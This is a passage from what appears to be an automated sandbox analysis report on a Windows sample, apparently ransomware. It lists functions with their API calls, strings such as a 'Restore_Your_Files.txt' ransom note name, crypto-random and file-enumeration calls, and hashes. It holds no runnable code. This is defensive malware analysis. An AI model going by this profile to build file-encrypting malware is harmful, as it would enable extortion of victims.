                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                        • String ID:
                                                                                                        • API String ID: 2508902052-0
                                                                                                        • Opcode ID: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                                                                                        • Instruction ID: 0ca2454eb47dc92c9cfe1a904f2f17824c1af9866a8435bf22e4369e8adcbe14
                                                                                                        • Opcode Fuzzy Hash: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                                                                                        • Instruction Fuzzy Hash: F9815BB1E006259FCB18DFA8C580A6EBBF5FF48304B1586ADD545A7781CB70ED52CB84
                                                                                                        Function 00A8E830 Relevance: 13.1, APIs: 5, Strings: 2, Instructions: 818networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A75130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00A75198
                                                                                                          • Part of subcall function 00A75130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00A751AC
                                                                                                          • Part of subcall function 00A75130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00A751C0
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A8EEE0
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EF8B
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EFA1
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EFC0
                                                                                                        • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,AE695AF0,00000000), ref: 00A8EFD7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Path$Network$CreateSemaphore$Ios_base_dtorstd::ios_base::_
                                                                                                        • String ID: X$\Restore_Your_Files.txt
                                                                                                        • API String ID: 3524565764-1189399128
                                                                                                        • Opcode ID: e562a0d875bd1d91a87eba6fd5a2c46b51d57e2a5b5db00ba455187eb4ce8490
                                                                                                        • Instruction ID: 3d68a3591fd7be7f9fad3dfb961ea3d20c8069aae09790fe25a555042b2a1bf0
                                                                                                        • Opcode Fuzzy Hash: e562a0d875bd1d91a87eba6fd5a2c46b51d57e2a5b5db00ba455187eb4ce8490
                                                                                                        • Instruction Fuzzy Hash: B772D071E00259DFDF14EB68CD85BEDBBB5AF45300F1441A9E809A7282DB709E84CF91
                                                                                                        Function 00AB5400 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB5477
                                                                                                        Strings
                                                                                                        • Unflushable<T>: this object has buffered input that cannot be flushed, xrefs: 00AB550E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: Unflushable<T>: this object has buffered input that cannot be flushed
                                                                                                        • API String ID: 2005118841-3781273281
                                                                                                        • Opcode ID: 01fe46d621cbce5ebece7225ba1f3f3f0dcf12112009a01c64c482496e8805c8
                                                                                                        • Instruction ID: 40fada0bfb1b3ae8ce6b9d419ae97bb7694972b831c30773f32e8d7b826775f2
                                                                                                        • Opcode Fuzzy Hash: 01fe46d621cbce5ebece7225ba1f3f3f0dcf12112009a01c64c482496e8805c8
                                                                                                        • Instruction Fuzzy Hash: CDA15C72904208EFCB05DFA4D845FEEBBF8FB08710F404AA9F915A7691DB74A954CB90
                                                                                                        Function 00B40B04 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __floor_pentium4
                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                        • Opcode ID: ec2b6692147009731765028fa7c1276a0efe589626af6698708b2e5c36840422
                                                                                                        • Instruction ID: 66973595963d400540dc0ee8981c4b8bb73b3c536341ccd02a89869742df8511
                                                                                                        • Opcode Fuzzy Hash: ec2b6692147009731765028fa7c1276a0efe589626af6698708b2e5c36840422
                                                                                                        • Instruction Fuzzy Hash: ADC21671E086288FDB25DE289D807EAB7F9EB84305F1545EAD84DE7240E774AF819F40
                                                                                                        Function 00B002E0 Relevance: 10.1, APIs: 8, Instructions: 124memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(FFFFFFFF,AE695AF0,?,?,?,?,?,00B50278,000000FF), ref: 00B00315
                                                                                                        • TlsSetValue.KERNEL32(FFFFFFFF,?), ref: 00B00359
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00B50278,000000FF), ref: 00B0037F
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00B50278,000000FF), ref: 00B00386
                                                                                                        • GetProcessHeap.KERNEL32(00000000), ref: 00B003C0
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B003C7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B003D0
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B003D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess$Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3709577838-0
                                                                                                        • Opcode ID: a859e69bb5fc0a75c9e51bfa48ae6e034af3df8d5d1cff6d8ec2d65c31f90de9
                                                                                                        • Instruction ID: 6fe632d2e168475029e218e13bf5a47edc46ca01b87f4a40fbf3db5c563b356c
                                                                                                        • Opcode Fuzzy Hash: a859e69bb5fc0a75c9e51bfa48ae6e034af3df8d5d1cff6d8ec2d65c31f90de9
                                                                                                        • Instruction Fuzzy Hash: 094150316103009FDB25AFA9D889B1ABBE8EF09B61F0445A8F915E73D1DB70EC00CB64
                                                                                                        Function 00AD4390 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 263encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000010,AE695AF0,7597FC30,?), ref: 00AD43E0
                                                                                                        • CryptReleaseContext.ADVAPI32(00000001,00000000,?,00000000,?,00B562DC,00000002, operation failed with error ,0000001D,?,?,OS_Rng: ,00000008,?), ref: 00AD4710
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextCryptErrorLastRelease
                                                                                                        • String ID: operation failed with error $OS_Rng:
                                                                                                        • API String ID: 3299239745-700108173
                                                                                                        • Opcode ID: 400e9573fe19dfc70ce6591c2ddbd83d1283c2d976d444b789018b637411b0e9
                                                                                                        • Instruction ID: 0f18e2205197193c16e6bc4cba17076e705b857c46aafe6f2c9168e2e2c02258
                                                                                                        • Opcode Fuzzy Hash: 400e9573fe19dfc70ce6591c2ddbd83d1283c2d976d444b789018b637411b0e9
                                                                                                        • Instruction Fuzzy Hash: 1DA1E371910248DFEB18DF68CD88B9EBBB1FF49304F148299E005AB3D2DB759A84CB50
                                                                                                        Function 00A75330 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 247COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,AE695AF0), ref: 00A753FE
                                                                                                        • ReleaseSemaphore.KERNEL32(?,00000001,774D30DF,AE695AF0), ref: 00A754D9
                                                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 00A755E6
                                                                                                        Strings
                                                                                                        • boost shared_lock has no mutex, xrefs: 00A75554
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ObjectReleaseSemaphoreSingleWait___std_exception_destroy
                                                                                                        • String ID: boost shared_lock has no mutex
                                                                                                        • API String ID: 1459948668-3890706923
                                                                                                        • Opcode ID: b333061435646deae1af4b702f78becdd07a0e77ea770738d96113585bb81f7a
                                                                                                        • Instruction ID: e9e104f7e51c875784cd047a57be8d96dac4bcb606948c1a3d90f8c92bf432a8
                                                                                                        • Opcode Fuzzy Hash: b333061435646deae1af4b702f78becdd07a0e77ea770738d96113585bb81f7a
                                                                                                        • Instruction Fuzzy Hash: CB81AF71E00A059FDB18CF64CD51BBAB7B6EF44314F14C16DE91AAB390DBB4AA44CB90
                                                                                                        Function 00A88380 Relevance: 6.3, APIs: 4, Instructions: 349fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00008003,AE695AF0,00000000,?,00000000), ref: 00A884E3
                                                                                                        • FindFirstFileW.KERNEL32(?,?,00B6FBE0,00000002,00B6FBDC,?,?,?), ref: 00A8853F
                                                                                                        • SetErrorMode.KERNEL32(00008003,AE695AF0), ref: 00A8AF9D
                                                                                                        • FindFirstFileW.KERNEL32(?,?,00B6FBE0,00000002), ref: 00A8AFC5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileFindFirstMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 3909587737-0
                                                                                                        • Opcode ID: a85e701ef11938fa7e073f7f635e6709032d42221da8fd40d01582035727eca9
                                                                                                        • Instruction ID: e5b5372e5b7f5bb18167505fcd27e7a465e840469e22ea514cf4235d20ad255f
                                                                                                        • Opcode Fuzzy Hash: a85e701ef11938fa7e073f7f635e6709032d42221da8fd40d01582035727eca9
                                                                                                        • Instruction Fuzzy Hash: E3C1F671A101099FDB18EF68CD85BAEBBB5FF84310F50866DF81597290DB38EA45CB90
                                                                                                        Function 00B3E50A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00B30C70,?,?,?,?,00B306C7,?,00000004), ref: 00B3E5EC
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00B3E67C
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00B3E68A
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00B30C70,00000000,00B30D90), ref: 00B3E72D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 4212172061-0
                                                                                                        • Opcode ID: 0711d029d3e4991ee041b65263a9848a912d951be7dc15dc060dc0cd2420cc4e
                                                                                                        • Instruction ID: f1368d8e40333a1ba856dd51d1616cce4e0097d472ef3e53d5052def6ca3a3c0
                                                                                                        • Opcode Fuzzy Hash: 0711d029d3e4991ee041b65263a9848a912d951be7dc15dc060dc0cd2420cc4e
                                                                                                        • Instruction Fuzzy Hash: 7F61E571600606AADB24AB75DC86FAA77E8EF54700F3404EBF925DB1C1EB70E90087A4
                                                                                                        Function 00ADD990 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 584COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ADE0CD
                                                                                                        Strings
                                                                                                        • : block size of underlying block cipher is not 16, xrefs: 00ADE09E
                                                                                                        • TableSize, xrefs: 00ADDA28
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: : block size of underlying block cipher is not 16$TableSize
                                                                                                        • API String ID: 2005118841-2295039505
                                                                                                        • Opcode ID: 8dd08fd9e05c02ae9aaad0ce15c1b44145d9bd4b850a6b9d1456f7dfc529c1d3
                                                                                                        • Instruction ID: e7d536c947dc6ec96bab61dde960ffdfc6b51d599ed5677d048837231870153e
                                                                                                        • Opcode Fuzzy Hash: 8dd08fd9e05c02ae9aaad0ce15c1b44145d9bd4b850a6b9d1456f7dfc529c1d3
                                                                                                        • Instruction Fuzzy Hash: 7B3218B1D002198FDB24CF69C944A9DF7B5FF98304F25866ED45AAB352DB70A981CF80
                                                                                                        Function 00AD4760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00AD47F0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00AD487A
                                                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,AE695AF0), ref: 00AD479A
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AD47E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextException@8RandomReleaseThrow
                                                                                                        • String ID: CryptGenRandom
                                                                                                        • API String ID: 1047471967-3616286655
                                                                                                        • Opcode ID: 6713dad64c805c4cdbd44fee75b1ff69b6c46a961da9c6b7884ccb3f01ab467a
                                                                                                        • Instruction ID: d5ebbcbbb9cfb30ae456312ba5fa46b37c2936c6e94511125b8e748e0c64f767
                                                                                                        • Opcode Fuzzy Hash: 6713dad64c805c4cdbd44fee75b1ff69b6c46a961da9c6b7884ccb3f01ab467a
                                                                                                        • Instruction Fuzzy Hash: 10015231944208AFCB15EF94DC45FDEBBF8FB09750F4045AAE812AB2A0DF74A904CB90
                                                                                                        Function 00A71020 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __onexit
                                                                                                        • String ID: Dflt$Dflt$Dflt$Dflt
                                                                                                        • API String ID: 1448380652-281602996
                                                                                                        • Opcode ID: 6c9b0d0bf1b05f6382f6967b02e20bbbb9e82d258acc17c84928640b4bfd3f8c
                                                                                                        • Instruction ID: c6c8adc0c8f6732909bbbdff0629c92299c6b5b03d7a589a7b7073c3713b0ceb
                                                                                                        • Opcode Fuzzy Hash: 6c9b0d0bf1b05f6382f6967b02e20bbbb9e82d258acc17c84928640b4bfd3f8c
                                                                                                        • Instruction Fuzzy Hash: 4C1136B1564748EFE741EF54EE1AB5A7BE0E705708F00825AE5056B3E0CFBA1108CF94
                                                                                                        Function 00B3E8F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343D9
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343E6
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B3E949
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B3E99A
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B3EA5A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 2829624132-0
                                                                                                        • Opcode ID: 4e7ec7b73340ee7fea5c572b953ed9083e049734bcf1045a9ba265916080f09c
                                                                                                        • Instruction ID: ea92ddb26ccff5800cc96c66d5f321f13c9dbb6890165f5f9547bff2b819da91
                                                                                                        • Opcode Fuzzy Hash: 4e7ec7b73340ee7fea5c572b953ed9083e049734bcf1045a9ba265916080f09c
                                                                                                        • Instruction Fuzzy Hash: 9F616F719506079BEB299F24CC82BBAB7E8FF04300F2041FAE926D65C5E775E951CB50
                                                                                                        Function 00AFC860 Relevance: 4.6, APIs: 3, Instructions: 80fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
